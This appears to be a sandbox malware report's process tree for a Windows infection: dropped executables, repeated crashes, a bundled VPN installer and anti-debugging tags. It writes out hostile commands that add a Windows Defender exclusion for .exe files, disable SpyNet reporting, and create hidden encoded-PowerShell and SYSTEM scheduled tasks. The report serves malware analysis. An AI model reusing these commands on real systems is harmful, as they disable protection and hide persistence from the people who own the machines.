C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
- Executes dropped EXE
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -remove7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 22404⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\iOCScfJj\qnNFsBc8mC239HI4ICw.exeC:\Users\Admin\AppData\Local\Temp\iOCScfJj\qnNFsBc8mC239HI4ICw.exe /S /site_id=6906894⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDAZrwueo" /SC once /ST 00:13:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gDAZrwueo"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gDAZrwueo"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bjuwDiWYYxyfpXHSNP" /SC once /ST 07:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uGlEhivBhQbjdirCX\rDJYlBYIgtHmaDE\diEMfCw.exe\" oO /site_id 690689 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 17364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 22404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 22284⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 23604⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\LyzedmcG\vpn.exeC:\Users\Admin\AppData\Local\Temp\LyzedmcG\vpn.exe /silent /subid=509xe7893e073614e30c5434c456745a8b564⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-06SIS.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-06SIS.tmp\vpn.tmp" /SL5="$202B6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\LyzedmcG\vpn.exe" /silent /subid=509xe7893e073614e30c5434c456745a8b565⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "6⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09017⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "6⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09017⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 17164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 24964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 24524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 21564⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 24964⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\DAEtPfX8\k0b4y.exeC:\Users\Admin\AppData\Local\Temp\DAEtPfX8\k0b4y.exe /sid=9 /pid=39 /lid=e7893e073614e30c5434c456745a8b564⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\toc\plx0.exeC:\Users\Admin\AppData\Roaming\toc\plx0.exe5⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\toc\0Dd19.exe"C:\Users\Admin\AppData\Roaming\toc\0Dd19.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 24604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 21204⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 18004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 24524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 18124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16284⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16844⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 20004⤵
- Executes dropped EXE
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 11804⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 17004⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19284⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 25084⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19364⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16764⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 24644⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16764⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19404⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 18004⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19124⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 17804⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 15644⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 17044⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16044⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 17724⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 1404⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4264 -ip 42641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4264 -ip 42641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4264 -ip 42641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4264 -ip 42641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4492 -ip 44921⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 4492 -ip 44921⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
